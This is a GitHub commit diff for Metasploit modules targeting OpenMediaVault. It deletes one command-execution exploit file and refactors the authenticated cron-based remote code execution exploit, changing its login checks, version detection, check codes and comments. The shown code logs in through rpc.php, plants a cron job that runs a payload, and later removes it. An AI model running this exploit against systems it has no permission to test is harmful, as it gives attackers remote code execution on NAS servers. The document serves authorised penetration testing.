Skip to content

Commit c94dc8f

Browse files
h00die-gr3yh00die-gr3y
committed
changes based on cdelafuente-r7 comments
1 parent 2175af9 commit c94dc8f

File tree

2 files changed

+24
-105
lines changed

2 files changed

+24
-105
lines changed

modules/exploits/multi/http/openmediavault_cmd_exec.rb

Lines changed: 0 additions & 93 deletions
This file was deleted.

modules/exploits/unix/webapp/openmediavault_auth_cron_rce.rb

Lines changed: 24 additions & 12 deletions
Original file line numberDiff line numberDiff line change
@@ -110,7 +110,7 @@ def login(user, pass)
110110
options: nil
111111
}.to_json
112112
})
113-
unless res.code == 200 && res.body.include?('"authenticated":true')
113+
unless res&.code == 200 && res.body.include?('"authenticated":true')
114114
res = send_request_cgi({
115115
'uri' => normalize_uri(target_uri.path, 'rpc.php'),
116116
'method' => 'POST',
@@ -126,7 +126,7 @@ def login(user, pass)
126126
}.to_json
127127
})
128128
end
129-
unless res.code == 200 && res.body.include?('"authenticated":true')
129+
unless res&.code == 200 && res.body.include?('"authenticated":true')
130130
res = send_request_cgi({
131131
'uri' => normalize_uri(target_uri.path, 'rpc.php'),
132132
'method' => 'POST',
@@ -148,7 +148,7 @@ def login(user, pass)
148148
true
149149
end
150150

151-
def check_version
151+
def check_target
152152
print_status('Trying to detect if target is running a vulnerable version of OpenMediaVault.')
153153
res = send_request_cgi({
154154
'uri' => normalize_uri(target_uri.path, 'rpc.php'),
@@ -163,14 +163,18 @@ def check_version
163163
})
164164
return nil unless rpc_success?(res)
165165

166+
res
167+
end
168+
169+
def check_version(res)
166170
# parse json response and get the version
167171
res_json = res.get_json_document
168172
unless res_json.blank?
169173
# OpenMediaVault v0.3 - v0.5 and up to v4 have different json formats where index 1 has the version information
170174
version = res_json.dig('response', 1, 'value')
171175
version = res_json.dig('response', 'version') if version.nil?
172176
version = res_json.dig('response', 'data', 1, 'value') if version.nil?
173-
return Rex::Version.new(version.split('(')[0].gsub(/[[:space:]]/, '')) unless version.nil?
177+
return Rex::Version.new(version.split('(')[0].gsub(/[[:space:]]/, '')) unless version.nil? || version.split('(')[0].nil?
174178
end
175179
nil
176180
end
@@ -317,7 +321,7 @@ def execute_command(cmd, _opts = {})
317321
end
318322

319323
# Apply and update cron configuration to trigger payload execution (1 minute)
320-
# versions lower then 0.5.48 do not need this because execution is automatic
324+
# In early releases, you do not have to apply the changes, but the exact release change is unknown, so we always apply
321325
apply_config_changes
322326
print_status('Cron payload execution triggered. Wait at least 1 minute for the session to be established.')
323327
end
@@ -341,7 +345,7 @@ def on_new_session(_session)
341345
})
342346
if rpc_success?(res)
343347
# Apply changes and update cron configuration to remove the payload entry
344-
# versions lower then 0.5.48 do not need this because execution is automatic
348+
# In early releases, you do not have to apply the changes, but the exact release change is unknown, so we always apply
345349
apply_config_changes
346350
print_good('Cron payload entry successfully removed.')
347351
else
@@ -355,19 +359,27 @@ def check
355359
@logged_in = login(user, pass)
356360
return CheckCode::Unknown('Failed to authenticate at OpenMediaVault.') unless @logged_in
357361

358-
@version_number = check_version
359-
return CheckCode::Unknown('Could not retrieve the version information.') if @version_number.nil?
360-
return CheckCode::Vulnerable("Version #{@version_number}") if @version_number.between?(Rex::Version.new('0.1'), Rex::Version.new('7.4.2-2'))
362+
res = check_target
363+
return CheckCode::Unknown('Can not identify target as OpenMediaVault.') if res.nil?
364+
365+
@version_number = check_version(res)
366+
return CheckCode::Detected('Can not retrieve the version information.') if @version_number.nil?
367+
return CheckCode::Appears("Version #{@version_number}") if @version_number.between?(Rex::Version.new('0.1'), Rex::Version.new('7.4.2-2'))
361368

362369
CheckCode::Detected("Version #{@version_number}")
363370
end
364371

365372
def exploit
366373
unless @logged_in
367374
if login(user, pass)
368-
@version_number = check_version
369-
fail_with(Failure::Unknown, 'Could not retrieve the version information.') if @version_number.nil?
370-
print_status("Version #{@version_number} detected.")
375+
res = check_target
376+
fail_with(Failure::Unknown, 'Can not identify target as OpenMediaVault.') if res.nil?
377+
@version_number = check_version(res)
378+
if @version_number.nil?
379+
print_status('Can not retrieve version information. Continue anyway...')
380+
else
381+
print_status("Version #{@version_number} detected.")
382+
end
371383
else
372384
fail_with(Failure::NoAccess, 'Failed to authenticate at OpenMediaVault.')
373385
end

0 commit comments

Comments
 (0)